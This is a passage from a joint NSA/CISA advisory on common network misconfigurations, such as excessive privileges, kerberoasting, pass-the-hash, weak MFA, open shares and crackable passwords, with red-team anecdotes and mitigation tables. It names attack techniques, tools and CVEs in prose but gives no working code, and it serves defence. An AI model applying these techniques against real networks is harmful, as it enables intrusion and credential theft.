privilege creep—the granting of excessive access and unnecessary account privileges. Through the analysis of topical and nested AD groups, a malicious actor can find a user account [T1078] that has been granted account privileges that exceed their need-to-know or least-privilege function. Extraneous access can lead to easy avenues for unauthorized access to data and resources and escalation of privileges in the targeted domain. Elevated Service Account Permissions Applications often operate using user accounts to access resources. These user accounts, which are known as service accounts, often require elevated privileges. When a malicious actor compromises an application or service using a service account, they will have the same privileges and access as the service account. Malicious actors can exploit elevated service permissions within a domain to gain unauthorized access and control over critical systems. Service accounts are enticing targets for malicious actors because such accounts are often granted elevated permissions within the domain due to the nature of the service, and because access to use the service can be requested by any valid domain user. Due to these factors, kerberoasting—a form of credential access achieved by cracking service account credentials—is a common technique used to gain control over service account targets [T1558.003]. Non-Essential Use of Elevated Accounts IT personnel use domain administrator and other administrator accounts for system and network management due to their inherent elevated privileges. When an administrator account is logged into a compromised host, a malicious actor can steal and use the account's credentials and an AD-generated authentication token [T1528] to move, using the elevated permissions, throughout the domain [T1550.001]. Using an elevated account for normal day-to-day, non-administrative tasks increases the account’s exposure and, therefore, its risk of compromise and its risk to the network. Malicious actors prioritize obtaining valid domain credentials upon gaining access to a network. Authentication using valid domain credentials allows the execution of secondary enumeration techniques to gain visibility into the target domain and AD structure, including discovery of elevated accounts and where the elevated accounts are used [T1087]. Targeting elevated accounts (such as domain administrator or system administrators) performing day-to-day activities provides the most direct path to achieve domain escalation. Systems or applications accessed by the targeted elevated accounts significantly increase the attack surface available to adversaries, providing additional paths and escalation options. After obtaining initial access via an account with administrative permissions, an assessment team compromised a domain in under a business day. The team first gained initial access to the system through phishing [T1566], by which they enticed the end user to download [T1204] and execute malicious payloads. The targeted end-user account had administrative permissions, enabling the team to quickly compromise the entire domain. 3. Insufficient Internal Network Monitoring Some organizations do not optimally configure host and network sensors for traffic collection and end-host logging. These insufficient configurations could lead to undetected adversarial compromise. Additionally, improper sensor configurations limit the traffic collection capability needed for enhanced baseline development and detract from timely detection of anomalous activity. Assessment teams have exploited insufficient monitoring to gain access to assessed networks. For example: An assessment team observed an organization with host-based monitoring, but no network monitoring. Host-based monitoring informs defensive teams about adverse activities on singular hosts and network monitoring informs about adverse activities traversing hosts [TA0008]. In this example, the organization could identify infected hosts but could not identify where the infection was coming from, and thus could not stop future lateral movement and infections. An assessment team gained persistent deep access to a large organization with a mature cyber posture. The organization did not detect the assessment team’s lateral movement, persistence, and command and control (C2) activity, including when the team attempted noisy activities to trigger a security response. For more information on this activity, see CSA CISA Red Team Shares Key Findings to Improve Monitoring and Hardening of Networks.[13] 4. Lack of Network Segmentation Network segmentation separates portions of the network with security boundaries. Lack of network segmentation leaves no security boundaries between the user, production, and critical system networks. Insufficient network segmentation allows an actor who has compromised a resource on the network to move laterally across a variety of systems uncontested. Lack of network segregation additionally leaves organizations significantly more vulnerable to potential ransomware attacks and post-exploitation techniques. Lack of segmentation between IT and operational technology (OT) environments places OT environments at risk. For example, assessment teams have often gained access to OT networks—despite prior assurance that the networks were fully air gapped, with no possible connection to the IT network—by finding special purpose, forgotten, or even accidental network connections [T1199]. 5. Poor Patch Management Vendors release patches and updates to address security vulnerabilities. Poor patch management and network hygiene practices often enable adversaries to discover open attack vectors and exploit critical vulnerabilities. Poor patch management includes: Lack of regular patching Use of unsupported operating systems (OSs) and outdated firmware Lack of Regular Patching Failure to apply the latest patches can leave a system open to compromise from publicly available exploits. Due to their ease of discovery—via vulnerability scanning [T1595.002] and open source research [T1592]—and exploitation, these systems are immediate targets for adversaries. Allowing critical vulnerabilities to remain on production systems without applying their corresponding patches significantly increases the attack surface. Organizations should prioritize patching known exploited vulnerabilities in their environments.[2] Assessment teams have observed threat actors exploiting many CVEs in public-facing applications [T1190], including: CVE-2019-18935 in an unpatched instance of Telerik® UI for ASP.NET running on a Microsoft IIS server.[14] CVE-2021-44228 (Log4Shell) in an unpatched VMware® Horizon server.[15] CVE-2022-24682, CVE-2022-27924, and CVE-2022-27925 chained with CVE-2022-37042, or CVE-2022-30333 in an unpatched Zimbra® Collaboration Suite.[16] Use of Unsupported OSs and Outdated Firmware Using software or hardware that is no longer supported by the vendor poses a significant security risk because new and existing vulnerabilities are no longer patched. Malicious actors can exploit vulnerabilities in these systems to gain unauthorized access, compromise sensitive data, and disrupt operations [T1210]. Assessment teams frequently observe organizations using unsupported Windows operating systems without updates MS17-010 and MS08-67. These updates, released years ago, address critical remote code execution vulnerabilities.[17],[18] 6. Bypass of System Access Controls A malicious actor can bypass system access controls by compromising alternate authentication methods in an environment. If a malicious actor can collect hashes in a network, they can use the hashes to authenticate using non-standard means, such as pass-the-hash (PtH) [T1550.002]. By mimicking accounts without the clear-text password, an actor can expand and fortify their access without detection. Kerberoasting is also one of the most time-efficient ways to elevate privileges and move laterally throughout an organization’s network. 7. Weak or Misconfigured MFA Methods Misconfigured Smart Cards or Tokens Some networks (generally government or DoD networks) require accounts to use smart cards or tokens. Multifactor requirements can be misconfigured so the password hashes for accounts never change. Even though the password itself is no longer used—because the smart card or token is required instead—there is still a password hash for the account that can be used as an alternative credential for authentication. If the password hash never changes, once a malicious actor has an account’s password hash [T1111], the actor can use it indefinitely, via the PtH technique for as long as that account exists. Lack of Phishing-Resistant MFA Some forms of MFA are vulnerable to phishing, “push bombing” [T1621], exploitation of Signaling System 7 (SS7) protocol vulnerabilities, and/or “SIM swap” techniques. These attempts, if successful, may allow a threat actor to gain access to MFA authentication credentials or bypass MFA and access the MFA-protected systems. (See CISA’s Fact Sheet Implementing Phishing-Resistant MFA for more information.)[3] For example, assessment teams have used voice phishing to convince users to provide missing MFA information [T1598]. In one instance, an assessment team knew a user’s main credentials, but their login attempts were blocked by MFA requirements. The team then masqueraded as IT staff and convinced the user to provide the MFA code over the phone, allowing the team to complete their login attempt and gain access to the user’s email and other organizational resources. 8. Insufficient ACLs on Network Shares and Services Data shares and repositories are primary targets for malicious actors. Network administrators may improperly configure ACLs to allow for unauthorized users to access sensitive or administrative data on shared drives. Actors can use commands, open source tools, or custom malware to look for shared folders and drives [T1135]. In one compromise, a team observed actors use the net share command—which displays information about shared resources on the local computer—and the ntfsinfo command to search network shares on compromised computers. In the same compromise, the actors used a custom tool, CovalentStealer, which is designed to identify file shares on a system, categorize the files [T1083], and upload the files to a remote server [TA0010].[19],[20] Ransomware actors have used the SoftPerfect® Network Scanner, netscan.exe—which can ping computers [T1018], scan ports [T1046], and discover shared folders—and SharpShares to enumerate accessible network shares in a domain.[21],[22] Malicious actors can then collect and exfiltrate the data from the shared drives and folders. They can then use the data for a variety of purposes, such as extortion of the organization or as intelligence when formulating intrusion plans for further network compromise. Assessment teams routinely find sensitive information on network shares [T1039] that could facilitate follow-on activity or provide opportunities for extortion. Teams regularly find drives containing cleartext credentials [T1552] for service accounts, web applications, and even domain administrators. Even when further access is not directly obtained from credentials in file shares, there can be a treasure trove of information for improving situational awareness of the target network, including the network’s topology, service tickets, or vulnerability scan data. In addition, teams regularly identify sensitive data and PII on shared drives (e.g., scanned documents, social security numbers, and tax returns) that could be used for extortion or social engineering of the organization or individuals. 9. Poor Credential Hygiene Poor credential hygiene facilitates threat actors in obtaining credentials for initial access, persistence, lateral movement, and other follow-on activity, especially if phishing-resistant MFA is not enabled. Poor credential hygiene includes: Easily crackable passwords Cleartext password disclosure Easily Crackable Passwords Easily crackable passwords are passwords that a malicious actor can guess within a short time using relatively inexpensive computing resources. The presence of easily crackable passwords on a network generally stems from a lack of password length (i.e., shorter than 15 characters) and randomness (i.e., is not unique or can be guessed). This is often due to lax requirements for passwords in organizational policies and user training. A policy that only requires short and simple passwords leaves user passwords susceptible to password cracking. Organizations should provide or allow employee use of password managers to enable the generation and easy use of secure, random passwords for each account. Often, when a credential is obtained, it is a hash (one-way encryption) of the password and not the password itself. Although some hashes can be used directly with PtH techniques, many hashes need to be cracked to obtain usable credentials. The cracking process takes the captured hash of the user’s plaintext password and leverages dictionary wordlists and rulesets, often using a database of billions of previously compromised passwords, in an attempt to find the matching plaintext password [T1110.002]. One of the primary ways to crack passwords is with the open source tool, Hashcat, combined with password lists obtained from publicly released password breaches. Once a malicious actor has access to a plaintext password, they are usually limited only by the account’s permissions. In some cases, the actor may be restricted or detected by advanced defense-in-depth and zero trust implementations as well, but this has been a rare finding in assessments thus far. Assessment teams have cracked password hashes for NTLM users, Kerberos service account tickets, NetNTLMv2, and PFX stores [T1555], enabling the team to elevate privileges and move laterally within networks. In 12 hours, one team cracked over 80% of all users' passwords in an Active Directory, resulting in hundreds of valid credentials. Cleartext Password Disclosure Storing passwords in cleartext is a serious security risk. A malicious actor with access to files containing cleartext passwords [T1552.001] could use these credentials to log into the affected applications or systems under the guise of a legitimate user. Accountability is lost in this situation as any system logs would record valid user accounts accessing applications or systems. Malicious actors search for text files, spreadsheets, documents, and configuration files in hopes of obtaining cleartext passwords. Assessment teams frequently discover cleartext passwords, allowing them to quickly escalate the emulated intrusion from the compromise of a regular domain user account to that of a privileged account, such as a Domain or Enterprise Administrator. A common tool used for locating cleartext passwords is the open source tool, Snaffler.[23] 10. Unrestricted Code Execution If unverified programs are allowed to execute on hosts, a threat actor can run arbitrary, malicious payloads within a network. Malicious actors often execute code after gaining initial access to a system. For example, after a user falls for a phishing scam, the actor usually convinces the victim to run code on their workstation to gain remote access to the internal network. This code is usually an unverified program that has no legitimate purpose or business reason for running on the network. Assessment teams and malicious actors frequently leverage unrestricted code execution in the form of executables, dynamic link libraries (DLLs), HTML applications, and macros (scripts used in office automation documents) [T1059.005] to establish initial access, persistence, and lateral movement. In addition, actors often use scripting languages [T1059] to obscure their actions [T1027.010] and bypass allowlisting—where organizations restrict applications and other forms of code by default and only allow those that are known and trusted. Further, actors may load vulnerable drivers and then exploit the drivers’ known vulnerabilities to execute code in the kernel with the highest level of system privileges to completely compromise the device [T1068]. MITIGATIONS Network Defenders NSA and CISA recommend network defenders implement the recommendations that follow to mitigate the issues identified in this advisory. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST) as well as with the MITRE ATT&CK Enterprise Mitigations and MITRE D3FEND frameworks. The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.[24] Mitigate Default Configurations of Software and Applications Table 1: Recommendations for Network Defenders to Mitigate Default Configurations of Software and Applications Misconfiguration Recommendations for Network Defenders Default configurations of software and applications Modify the default configuration of applications and appliances before deployment in a production environment [M1013],[D3-ACH]. Refer to hardening guidelines provided by the vendor and related cybersecurity guidance (e.g., DISA's Security Technical Implementation Guides (STIGs) and configuration guides).[25],[26],[27] Default configurations of software and applications: Default Credentials Change or disable vendor-supplied default usernames and passwords of services, software, and equipment when installing or commissioning [CPG 2.A]. When resetting passwords, enforce the use of “strong” passwords (i.e., passwords that are more than 15 characters and random [CPG 2.B]) and follow hardening guidelines provided by the vendor, STIGs, NSA, and/or NIST [M1027],[D3-SPP].[25],[26],[28],[29] Default service permissions and configuration settings: Insecure Active Directory Certificate Services Ensure the secure configuration of ADCS implementations. Regularly update and patch the controlling infrastructure (e.g., for CVE-2021-36942), employ monitoring and auditing mechanisms, and implement strong access controls to protect the infrastructure. If not needed, disable web-enrollment in ADCS servers. See Microsoft: Uninstall-AdcsWebEnrollment (ADCSDeployment) for guidance.[30] If web enrollment is needed on ADCS servers: Enable Extended Protection for Authentication (EPA) for Client Authority Web Enrollment. This is done by choosing the “Required” option. For guidance, see Microsoft: KB5021989: Extended Protection for Authentication.[31] Enable “Require SSL” on the ADCS server. Disable NTLM on all ADCS servers. For guidance, see Microsoft: Network security Restrict NTLM in this domain - Windows Security | Microsoft Learn and Network security Restrict NTLM Incoming NTLM traffic - Windows Security.[32],[33] Disable SAN for UPN Mapping. For guidance see, Microsoft: How to disable the SAN for UPN mapping - Windows Server. Instead, smart card authentication can use the altSecurityIdentities attribute for explicit mapping of certificates to accounts more securely.[34] Review all permissions on the ADCS templates on applicable servers. Restrict enrollment rights to only those users or groups that require it. Disable the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag from templates to prevent users from supplying and editing sensitive security settings within these templates. Enforce manager approval for requested certificates. Remove FullControl, WriteDacl, and Write property permissions from low-privileged groups, such as domain users, to certificate template objects. Default service permissions and configuration settings: Insecure legacy protocols/services Determine if LLMNR and NetBIOS are required for essential business operations. If not required, disable LLMNR and NetBIOS in local computer security settings or by group policy. Default service permissions and configuration settings: Insecure SMB service Require SMB signing for both SMB client and server on all systems.[25] This should prevent certain adversary-in-the-middle and pass-the-hash techniques. For more information on SMB signing, see Microsoft: Overview of Server Message Block Signing. [35] Note: Beginning in Microsoft Windows 11 Insider Preview Build 25381, Windows requires SMB signing for all communications.[36] Mitigate Improper Separation of User/Administrator Privilege Table 2: Recommendations for Network Defenders to Mitigate Improper Separation of User/Administrator Privilege Misconfiguration Recommendations for Network Defenders Improper separation of user/administrator privilege: Excessive account privileges, Elevated service account permissions, and Non-essential use of elevated accounts Implement authentication, authorization, and accounting (AAA) systems [M1018] to limit actions users can perform, and review logs of user actions to detect unauthorized use and abuse. Apply least privilege principles to user accounts and groups allowing only the performance of authorized actions. Audit user accounts and remove those that are inactive or unnecessary on a routine basis [CPG 2.D]. Limit the ability for user accounts to create additional accounts. Restrict use of privileged accounts to perform general tasks, such as accessing emails and browsing the Internet [CPG 2.E],[D3-UAP]. See NSA Cybersecurity Information Sheet (CSI) Defend Privileges and Accounts for more information.[37] Limit the number of users within the organization with an identity and access management (IAM) role that has administrator privileges. Strive to reduce all permanent privileged role assignments, and conduct periodic entitlement reviews on IAM users, roles, and policies. Implement time-based access for privileged accounts. For example, the just-in-time access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model) by setting network-wide policy to automatically disable admin accounts at the Active Directory level. As needed, individual users can submit requests through an automated process that enables access to a system for a set timeframe. In cloud environments, just-in-time elevation is also appropriate and may be implemented using per-session federated claims or privileged access management tools. Restrict domain users from being in the local administrator group on multiple systems. Run daemonized applications (services) with non-administrator accounts when possible. Only configure service accounts with the permissions necessary for the services they control to operate. Disable unused services and implement ACLs to protect services. Mitigate Insufficient Internal Network Monitoring Table 3: Recommendations for Network Defenders to Mitigate Insufficient Internal Network Monitoring Misconfiguration Recommendations for Network Defenders Insufficient internal network monitoring Establish a baseline of applications and services, and routinely audit their access and use, especially for administrative activity [D3-ANAA]. For instance, administrators should routinely audit the access lists and permissions for of all web applications and services [CPG 2.O],[M1047]. Look for suspicious accounts, investigate them, and remove accounts and credentials, as appropriate, such as accounts of former staff.[39] Establish a baseline that represents an organization’s normal traffic activity, network performance, host application activity, and user behavior; investigate any deviations from that baseline [D3-NTCD],[D3-CSPP],[D3-UBA].[40] Use auditing tools capable of detecting privilege and service abuse opportunities on systems within an enterprise and correct them [M1047]. Implement a security information and event management (SIEM) system to provide log aggregation, correlation, querying, visualization, and alerting from network endpoints, logging systems, endpoint and detection response (EDR) systems and intrusion detection systems (IDS) [CPG 2.T],[D3-NTA]. Mitigate Lack of Network Segmentation Table 4: Recommendations for Network Defenders to Mitigate Lack of Network Segmentation Misconfiguration Recommendations for Network Defenders Lack of network segmentation Implement next-generation firewalls to perform deep packet filtering, stateful inspection, and application-level packet inspection [D3-NTF]. Deny or drop improperly formatted traffic that is incongruent with application-specific traffic permitted on the network. This practice limits an actor’s ability to abuse allowed application protocols. The practice of allowlisting network applications does not rely on generic ports as filtering criteria, enhancing filtering fidelity. For more information on application-aware defenses, see NSA CSI Segment Networks and Deploy Application-Aware Defenses.[41] Engineer network segments to isolate critical systems, functions, and resources [CPG 2.F],[D3-NI]. Establish physical and logical segmentation controls, such as virtual local area network (VLAN) configurations and properly configured access control lists (ACLs) on infrastructure devices [M1030]. These devices should be baselined and audited to prevent access to potentially sensitive systems and information. Leverage properly configured Demilitarized Zones (DMZs) to reduce service exposure to the Internet.[42],[43],[44] Implement separate Virtual Private Cloud (VPC) instances to isolate essential cloud systems. Where possible, implement Virtual Machines (VM) and Network Function Virtualization (NFV) to enable micro-segmentation of networks in virtualized environments and cloud data centers. Employ secure VM firewall configurations in tandem with macro segmentation. Mitigate Poor Patch Management Table 5: Recommendations for Network Defenders to Mitigate Poor Patch Management Misconfiguration Recommendations for Network Defenders Poor patch management: Lack of regular patching Ensure organizations implement and maintain an efficient patch management process that enforces the use of up-to-date, stable versions of OSs, browsers, and software [M1051],[D3-SU].[45] Update software regularly by employing patch management for externally exposed applications, internal enterprise endpoints, and servers. Prioritize patching known exploited vulnerabilities.[2] Automate the update process as much as possible and use vendor-provided updates. Consider using automated patch management tools and software update tools. Where patching is not possible due to limitations, segment networks to limit exposure of the vulnerable system or host. Poor patch management: Use of unsupported OSs and outdated firmware Evaluate the use of unsupported hardware and software and discontinue use as soon as possible. If discontinuing is not possible, implement additional network protections to mitigate the risk.[45] Patch the Basic Input/Output System (BIOS) and other firmware to prevent exploitation of known vulnerabilities. Mitigate Bypass of System Access Controls Table 6: Recommendations for Network Defenders to Mitigate Bypass of System Access Controls Misconfiguration Recommendations for Network Defenders Bypass of system access controls Limit credential overlap across systems to prevent credential compromise and reduce a malicious actor's ability to move laterally between systems [M1026],[D3-CH]. Implement a method for monitoring non-standard logon events through host log monitoring [CPG 2.G]. Implement an effective and routine patch management process. Mitigate PtH techniques by applying patch KB2871997 to Windows 7 and newer versions to limit default access of accounts in the local administrator group [M1051],[D3-SU].[46] Enable the PtH mitigations to apply User Account Control (UAC) restrictions to local accounts upon network logon [M1052],[D3-UAP]. Deny domain users the ability to be in the local administrator group on multiple systems [M1018],[D3-UAP]. Limit workstation-to-workstation communications. All workstation communications should occur through a server to prevent lateral movement [M1018],[D3-UAP]. Use privileged accounts only on systems requiring those privileges [M1018],[D3-UAP]. Consider using dedicated Privileged Access Workstations for privileged accounts to better isolate and protect them.[37] Mitigate Weak or Misconfigured MFA Methods Table 7: Recommendations for Network Defenders to Mitigate Weak or Misconfigured MFA Methods Misconfiguration Recommendations for Network Defenders Weak or misconfigured MFA methods: Misconfigured smart cards or tokens   In Windows environments: Disable the use of New Technology LAN Manager (NTLM) and other legacy authentication protocols that are susceptible to PtH due to their use of password hashes [M1032],[D3-MFA]. For guidance, see Microsoft: Network security Restrict NTLM in this domain - Windows Security | Microsoft Learn and Network security Restrict NTLM Incoming NTLM traffic - Windows Security.[32],[33] Use built-in functionality via Windows Hello for Business or Group Policy Objects (GPOs) to regularly re-randomize password hashes associated with smartcard-required accounts. Ensure that the hashes are changed at least as often as organizational policy requires passwords to be changed [M1027],[D3-CRO]. Prioritize upgrading any environments that cannot utilize this built-in functionality. As a longer-term effort, implement cloud-primary authentication solution using modern open standards. See CISA’s Secure Cloud Business Applications (SCuBA) Hybrid Identity Solutions Architecture for more information.[47] Note: this document is part of CISA’s Secure Cloud Business Applications (SCuBA) project, which provides guidance for FCEB agencies to secure their cloud business application environments and to protect federal information that is created, accessed, shared, and stored in those environments. Although tailored to FCEB agencies, the project’s guidance is applicable to all organizations.[48] Weak or misconfigured MFA methods: Lack of phishing-resistant MFA Enforce phishing-resistant MFA universally for access to sensitive data and on as many other resources and services as possible [CPG 2.H].[3],[49] Mitigate Insufficient ACLs on Network Shares and Services Table 8: Recommendations for Network Defenders to Mitigate Insufficient ACLs on Network Shares and Services Misconfiguration Recommendations for Network Defenders Insufficient ACLs on network shares and services Implement secure configurations for all storage devices and network shares that grant access to authorized users only. Apply the principal of least privilege to important information resources to reduce risk of unauthorized data access and manipulation. Apply restrictive permissions to files and directories, and prevent adversaries from modifying ACLs [M1022],[D3-LFP]. Set restrictive permissions on files and folders containing sensitive private keys to prevent unintended access [M1022],[D3-LFP]. Enable the Windows Group Policy security setting, "Do Not Allow Anonymous Enumeration of Security Account Manager (SAM) Accounts and Shares," to limit users who can enumerate network shares. Mitigate Poor Credential Hygiene Table 9: Recommendations for Network Defenders to Mitigate Poor Credential Hygiene Misconfiguration Recommendations for Network Defenders Poor credential hygiene: easily crackable passwords   Follow National Institute of Standards and Technologies (NIST) guidelines when creating password policies to enforce use of “strong” passwords that cannot be cracked [M1027],[D3-SPP].[29] Consider using password managers to generate and store passwords. Do not reuse local administrator account passwords across systems. Ensure that passwords are “strong” and unique [CPG 2.B],[M1027],[D3-SPP]. Use “strong” passphrases for private keys to make cracking resource intensive. Do not store credentials within the registry in Windows systems. Establish an organizational policy that prohibits password storage in files. Ensure adequate password length (ideally 25+ characters) and complexity requirements for Windows service accounts and implement passwords with periodic expiration on these accounts [CPG 2.B],[M1027],[D3-SPP]. Use Managed Service Accounts, when possible, to manage service account passwords automatically. Poor credential hygiene: cleartext password disclosure   Implement a review process for files and systems to look for cleartext account credentials. When credentials are found, remove, change, or encrypt them [D3-FE]. Conduct periodic scans of server machines using automated tools to determine whether sensitive data (e.g., personally identifiable information, protected health information) or credentials are stored. Weigh the risk of storing credentials in password stores and web browsers. If system, software, or web browser credential disclosure is of significant concern, technical controls, policy, and user training may prevent storage of credentials in improper locations. Store hashed passwords using Committee on National Security Systems Policy (CNSSP)-15 and Commercial National Security Algorithm Suite (CNSA) approved algorithms.[50],[51] Consider using group Managed Service Accounts (gMSAs) or third-party software to implement secure password-storage applications. Mitigate Unrestricted Code Execution Table 10: Recommendations for Network Defenders to Mitigate Unrestricted Code Execution Misconfiguration Recommendations for Network Defenders Unrestricted code execution Enable system settings that prevent the ability to run applications downloaded from untrusted sources.[52] Use application control tools that restrict program execution by default, also known as allowlisting [D3-EAL]. Ensure that the tools examine digital signatures and other key attributes, rather than just relying on filenames, especially since malware often attempts to masquerade as common Operating System (OS) utilities [M1038]. Explicitly allow certain .exe files to run, while blocking all others by default. Block or prevent the execution of known vulnerable drivers that adversaries may exploit to execute code in kernel mode. Validate driver block rules in audit mode to ensure stability prior to production deployment [D3-OSM]. Constrain scripting languages to prevent malicious activities, audit script logs, and restrict scripting languages that are not used in the environment [D3-SEA]. See joint Cybersecurity Information Sheet: Keeping PowerShell: Security Measures to Use and Embrace.[53] Use read-only containers and minimal images, when possible, to prevent the running of commands. Regularly analyze border and host-level protections, including spam-filtering capabilities, to ensure their continued effectiveness in blocking the delivery and execution of malware [D3-MA]. Assess whether HTML Application (HTA) files are used for business purposes in your environment; if HTAs are not used, remap the default program for opening them from mshta.exe to notepad.exe. Software Manufacturers NSA and CISA recommend software manufacturers implement the recommendations in Table 11 to reduce the prevalence of misconfigurations identified in this advisory. These mitigations align with tactics provided in joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Security-by-Design and -Default. NSA and CISA strongly encourage software manufacturers apply these recommendations to ensure their products are secure “out of the box” and do not require customers to spend additional resources making configuration changes, performing monitoring, and conducting routine updates to keep their systems secure.[1] Table 11: Recommendations for Software Manufacturers to Mitigate Identified Misconfigurations Misconfiguration Recommendations for Software Manufacturers Default configurations of software and applications Embed security controls into product architecture from the start of development and throughout the entire SDLC by following best practices in NIST’s Secure Software Development Framework (SSDF), SP 800-218.[54] Provide software with security features enabled “out of the box” and accompanied with “loosening” guides instead of hardening guides. “Loosening” guides should explain the business risk of decisions in plain, understandable language. Default configurations of software and applications: Default credentials Eliminate default passwords: Do not provide software with default passwords that are universally shared. To eliminate default passwords, require administrators to set a “strong” password [CPG 2.B] during installation and configuration. Default configurations of software and applications: Default service permissions and configuration settings Consider the user experience consequences of security settings: Each new setting increases the cognitive burden on end users and should be assessed in conjunction with the business benefit it derives. Ideally, a setting should not exist; instead, the most secure setting should be integrated into the product by default. When configuration is necessary, the default option should be broadly secure against common threats. Improper separation of user/administrator privilege: Excessive account privileges, Elevated service account permissions, and Non-essential use of elevated accounts Design products so that the compromise of a single security control does not result in compromise of the entire system. For example, ensuring that user privileges are narrowly provisioned by default and ACLs are employed can reduce the impact of a compromised account. Also, software sandboxing techniques can quarantine a vulnerability to limit compromise of an entire application. Automatically generate reports for: Administrators of inactive accounts. Prompt administrators to set a maximum inactive time and automatically suspend accounts that exceed that threshold. Administrators of accounts with administrator privileges and suggest ways to reduce privilege sprawl. Automatically alert administrators of infrequently used services and provide recommendations for disabling them or implementing ACLs. Insufficient internal network monitoring   Provide high-quality audit logs to customers at no extra charge. Audit logs are crucial for detecting and escalating potential security incidents. They are also crucial during an investigation of a suspected or confirmed security incident. Consider best practices such as providing easy integration with a security information and event management (SIEM) system with application programming interface (API) access that uses coordinated universal time (UTC), standard time zone formatting, and robust documentation techniques. Lack of network segmentation Ensure products are compatible with and tested in segmented network environments. Poor patch management: Lack of regular patching Take steps to eliminate entire classes of vulnerabilities by embedding security controls into product architecture from the start of development and throughout the SDLC by following best practices in NIST’s SSDF, SP 800-218.[54] Pay special attention to: Following secure coding practices [SSDF PW 5.1]. Use memory-safe programming languages where possible, parametrized queries, and web template languages. Conducting code reviews [SSDF PW 7.2, RV 1.2] against peer coding standards, checking for backdoors, malicious content, and logic flaws. Testing code to identify vulnerabilities and verify compliance with security requirements [SSDF PW 8.2]. Ensure that published CVEs include root cause or common weakness enumeration (CWE) to enable industry-wide analysis of software security design flaws. Poor patch management: Use of unsupported operating OSs and outdated firmware Communicate the business risk of using unsupported OSs and firmware in plain, understandable language. Bypass of system access controls Provide sufficient detail in audit records to detect bypass of system controls and queries to monitor audit logs for traces of such suspicious activity (e.g., for when an essential step of an authentication or authorization flow is missing). Weak or Misconfigured MFA Methods: Misconfigured Smart Cards or Tokens   Fully support MFA for all users, making MFA the default rather than an opt-in feature. Utilize threat modeling for authentication assertions and alternate credentials to examine how they could be abused to bypass MFA requirements. Weak or Misconfigured MFA Methods: Lack of phishing-resistant MFA Mandate MFA, ideally phishing-resistant, for privileged users and make MFA a default rather than an opt-in feature.[3] Insufficient ACL on network shares and services Enforce use of ACLs with default ACLs only allowing the minimum access needed, along with easy-to-use tools to regularly audit and adjust ACLs to the minimum access needed. Poor credential hygiene: easily crackable passwords   Allow administrators to configure a password policy consistent with NIST’s guidelines—do not require counterproductive restrictions such as enforcing character types or the periodic rotation of passwords.[29] Allow users to use password managers to effortlessly generate and use secure, random passwords within products. Poor credential hygiene: cleartext password disclosure Salt and hash passwords using a secure hashing algorithm with high computational cost to make brute force cracking more difficult. Unrestricted code execution Support execution controls within operating systems and applications “out of the box” by default at no extra charge for all customers, to limit malicious actors’ ability to abuse functionality or launch unusual applications without administrator or informed user approval. VALIDATE SECURITY CONTROLS In addition to applying mitigations, NSA and CISA recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. NSA and CISA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started: Select an ATT&CK technique described in this advisory (see Table 12–Table 21). Align your security technologies against the technique. Test your technologies against the technique. Analyze your detection and prevention technologies’ performance. Repeat the process for all security technologies to obtain a set of comprehensive performance data. Tune your security program, including people, processes, and technologies, based on the data generated by this process. CISA and NSA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. LEARN FROM HISTORY The misconfigurations described above are all too common in assessments and the techniques listed are standard ones leveraged by multiple malicious actors, resulting in numerous real network compromises. Learn from the weaknesses of others and implement the mitigations above properly to protect the network, its sensitive information, and critical missions. WORKS CITED [1]   Joint Guide: Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Security-by-Design and -Default (2023), https://www.cisa.gov/sites/default/files/2023-06/principles_approaches_for_security-by-design-default_508c.pdf [2]   CISA, Known Exploited Vulnerabilities Catalog, https://www.cisa.gov/known-exploited-vulnerabilities-catalog [3]   CISA, Implementing Phishing-Resistant MFA, https://www.cisa.gov/sites/default/files/publications/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf [4]   MITRE, ATT&CK for Enterprise, https://attack.mitre.org/versions/v13/matrices/enterprise/ [5]   MITRE, D3FEND, https://d3fend.mitre.org/ [6]   CISA, Best Practices for MITRE ATT&CK Mapping, https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping [7]   CISA, Decider Tool, https://github.com/cisagov/Decider/ [8]   CISA, Cyber Assessment Fact Sheet, https://www.cisa.gov/sites/default/files/publications/VM_Assessments_Fact_Sheet_RVA_508C.pdf [9]   Joint CSA: Weak Security Controls and Practices Routinely Exploited for Initial Access, https://media.defense.gov/2022/May/17/2002998718/-1/-1/0/CSA_WEAK_SECURITY_CONTROLS_PRACTICES_EXPLOITED_FOR_INITIAL_ACCESS.PDF [10]  Microsoft KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS), https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429 [11]  Raj Chandel, Domain Escalation: PetitPotam NTLM Relay to ADCS Endpoints, https://www.hackingarticles.in/domain-escalation-petitpotam-ntlm-relay-to-adcs-endpoints/ [12]  SpecterOps - Will Schroeder, Certified Pre-Owned, https://posts.specterops.io/certified-pre-owned-d95910965cd2 [13]  CISA, CSA: CISA Red Team Shares Key Findings to Improve Monitoring and Hardening of Networks, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-059a [14]  Joint CSA: Threat Actors Exploit Progress Telerik Vulnerabilities in Multiple U.S. Government IIS Servers, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-074a [15]  Joint CSA: Iranian Government-Sponsored APT Actors Compromise Federal Network, Deploy Crypto Miner, Credential Harvester, https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-320a [16]  Joint CSA: Threat Actors Exploiting Multiple CVEs Against Zimbra Collaboration Suite, https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-228a [17]  Microsoft, How to verify that MS17-010 is installed, 